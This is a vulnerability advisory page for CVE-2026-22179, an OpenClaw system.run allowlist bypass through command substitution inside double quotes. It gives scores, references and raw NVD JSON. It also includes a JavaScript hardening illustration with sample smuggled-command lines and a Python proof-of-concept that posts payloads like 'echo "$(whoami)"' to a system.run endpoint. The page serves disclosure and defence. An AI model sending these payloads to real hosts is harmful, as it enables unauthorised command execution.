Security Vulnerability Report
CVE-2026-22179 CVSS 7.2 HIGH

Published: 2026-03-18 02:16:22
Last Modified: 2026-03-25 15:16:37

Description

OpenClaw versions prior to 2026.2.22 in macOS node-host system.run contain an allowlist bypass vulnerability that allows remote attackers to execute non-allowlisted commands by exploiting improper parsing of command substitution tokens. Attackers can craft shell payloads with command substitution syntax within double-quoted text to bypass security restrictions and execute arbitrary commands on the system.
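As an added illustration of the bug class the description names (hypothetical code, not OpenClaw's implementation; the allowlist contents, function names and sample command lines are assumptions), the following JavaScript puts a naive leading-word allowlist check beside a hardened check that tracks POSIX quote state and refuses command-substitution tokens in every context where the shell would still expand them, i.e. unquoted and double-quoted text:

```javascript
// Added illustration of the bug class behind CVE-2026-22179 (hypothetical
// code, not OpenClaw's implementation): an allowlist that inspects only the
// leading word of a shell command line, beside a hardened check that walks
// POSIX quote state and rejects command-substitution tokens wherever the
// shell would expand them. The allowlist contents are assumed.

const ALLOWLIST = new Set(['echo', 'ls', 'cat']);

// Naive check: the first whitespace-delimited word decides. Quoted text is
// never inspected, so 'echo "$(whoami)"' passes as an allowlisted echo.
function naiveAllowlistCheck(cmdline) {
  const head = cmdline.trim().split(/\s+/)[0];
  return ALLOWLIST.has(head);
}

// Scan the line tracking single-quote, double-quote and backslash state.
// Inside single quotes everything is literal. Inside double quotes and in
// unquoted text the shell still expands $(...), ${...} and `...`, so those
// tokens are rejected there; process substitution <( >( and the control
// operators ; | & newline only matter unquoted. A backslash outside single
// quotes makes the next character literal (e.g. "\$(x)" is plain text).
// Returns null if the line is safe, else the offending token and offset.
function findUnsafeToken(cmdline) {
  let inSingle = false;
  let inDouble = false;
  let escaped = false;
  for (let i = 0; i < cmdline.length; i++) {
    const c = cmdline[i];
    const next = cmdline[i + 1];
    if (escaped) { escaped = false; continue; }
    if (inSingle) {
      if (c === "'") inSingle = false;
      continue;
    }
    if (c === '\\') { escaped = true; continue; }
    if (c === '"') { inDouble = !inDouble; continue; }
    if (!inDouble && c === "'") { inSingle = true; continue; }
    // From here on the shell performs expansions.
    if (c === '`') return { index: i, token: '`' };
    if (c === '$' && (next === '(' || next === '{')) return { index: i, token: '$' + next };
    if (!inDouble) {
      if ((c === '<' || c === '>') && next === '(') return { index: i, token: c + '(' };
      if (c === ';' || c === '|' || c === '&' || c === '\n') return { index: i, token: c };
    }
  }
  if (inSingle || inDouble) return { index: cmdline.length, token: 'unterminated quote' };
  return null;
}

// Hardened check: the leading word must be allowlisted AND no token that
// would let the shell run a second command may appear outside single quotes.
function hardenedAllowlistCheck(cmdline) {
  return naiveAllowlistCheck(cmdline) && findUnsafeToken(cmdline) === null;
}

// Constructed sample lines: the advisory's double-quoted substitution shape
// plus benign and non-allowlisted variants.
const SAMPLES = [
  'echo hello',             // benign: both checks allow
  "echo '$(whoami)'",       // single-quoted: literal text, both allow
  'echo "\\$(whoami)"',     // escaped $ inside double quotes: literal, both allow
  'echo "$(whoami)"',       // CVE-2026-22179 shape: naive allows, hardened rejects
  'echo "`id`"',            // backtick form: naive allows, hardened rejects
  'echo hi; whoami',        // command separator: naive allows, hardened rejects
  'whoami',                 // not allowlisted: both reject
];

function classifySamples() {
  return SAMPLES.map((cmd) => ({
    cmd,
    naive: naiveAllowlistCheck(cmd),
    hardened: hardenedAllowlistCheck(cmd),
    reason: (findUnsafeToken(cmd) || { token: null }).token,
  }));
}

for (const r of classifySamples()) {
  console.log(`${r.naive ? 'ALLOW' : 'DENY '} / ${r.hardened ? 'ALLOW' : 'DENY '}  ${r.cmd}` +
    (r.reason ? `   (rejected on ${JSON.stringify(r.reason)})` : ''));
}
```

The token scan is defense in depth, not the primary fix: a denylist of shell metacharacters is only as complete as the author's knowledge of the shell's grammar. The robust design for a system.run style feature is to never hand the caller's text to a shell at all, that is, to resolve the allowlisted program and pass its arguments as an argv array to the process-spawning API with shell interpretation disabled, so that `$(...)` and backticks reach the child only as literal bytes.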

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-78 (Improper Neutralization of Special Elements used in an OS Command, "OS Command Injection")

Other scores recorded for this CVE (see Raw JSON Data below): a CVSS 4.0 base score of 7.5 HIGH (CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N), and a secondary CVSS 3.1 score of 6.6 MEDIUM (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) that rates attack complexity as high.

Every vector carries PR:H: the attacker must already hold credentials authorized to invoke system.run. The bypass turns a caller restricted to allowlisted commands into one that can run arbitrary commands, so "remote attackers" in the description means authenticated, privileged remote callers, not anonymous ones.

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.22 (macOS node-host system.run)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22179 PoC - OpenClaw system.run Command Substitution Bypass
# Demonstrates how command substitution inside double-quoted text bypasses
# the allowlist applied by the macOS node-host system.run handler.
import requests

# Target configuration. The endpoint path and request body shape below are
# placeholders for the node-host interface; adjust them to the deployment
# under test.
TARGET_URL = "http://target-host:8080/api/system/run"
# Alternative payload: the substitution runs even though the outer command is
# allowlisted, so the inner command can write to disk as proof of execution.
VULNERABLE_PAYLOAD = '$(whoami > /tmp/pwned)'


def craft_malicious_input():
    """
    OpenClaw's system.run has an allowlist for permitted commands.
    The allowlist only inspects the top-level command, so a substitution
    inside a double-quoted argument is handed to the shell unexamined.
    """
    # Sent on its own, a non-allowlisted command such as this is blocked.
    normal_cmd = "whoami"

    # Wrapped in $(...) inside a double-quoted argument to an allowlisted
    # command: the system.run parser treats the quoted text as a plain
    # string, but the shell expands the substitution and runs the inner
    # command.
    bypass_payload = 'echo "$(whoami)"'

    # Backtick form of the same substitution.
    bypass_payload_alt = 'echo "`id`"'

    return bypass_payload


def exploit(target_url, payload):
    """Send the payload to the system.run endpoint and report the result."""
    # PR:H in the CVSS vector: the caller must already hold credentials that
    # are authorized to invoke system.run.
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <valid-token-with-privileges>",
    }
    data = {"command": payload, "args": [], "timeout": 30}
    try:
        response = requests.post(target_url, json=data, headers=headers, timeout=10)
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text}")
        # A 200 with an output field means the substituted command ran.
        if response.status_code == 200:
            result = response.json()
            if "output" in result:
                print("\n[!] Command executed successfully!")
                print(f"Output: {result['output']}")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    payload = craft_malicious_input()
    print(f"[*] Sending payload: {payload}")
    exploit(TARGET_URL, payload)

References

https://github.com/openclaw/openclaw/commit/90a378ca3a9ecbf1634cd247f17a35f4612c6ca6 (Patch)
https://github.com/openclaw/openclaw/security/advisories/GHSA-9p38-94jf-hgjj (Exploit, Vendor Advisory)
https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-command-substitution-in-system-run (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22179", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:22.377", "lastModified": "2026-03-25T15:16:36.730", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 in macOS node-host system.run contain an allowlist bypass vulnerability that allows remote attackers to execute non-allowlisted commands by exploiting improper parsing of command substitution tokens. Attackers can craft shell payloads with command substitution syntax within double-quoted text to bypass security restrictions and execute arbitrary commands on the system."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a la 2026.2.22 en el system.run del host de nodo de macOS contienen una vulnerabilidad de omisión de lista de permitidos que permite a atacantes remotos ejecutar comandos no incluidos en la lista de permitidos explotando un análisis incorrecto de tokens de sustitución de comandos. Los atacantes pueden crear cargas útiles de shell con sintaxis de sustitución de comandos dentro de texto entre comillas dobles para omitir restricciones de seguridad y ejecutar comandos arbitrarios en el sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", 
"integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/90a378ca3a9ecbf1634cd247f17a35f4612c6ca6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9p38-94jf-hgjj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-command-substitution-in-system-run", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}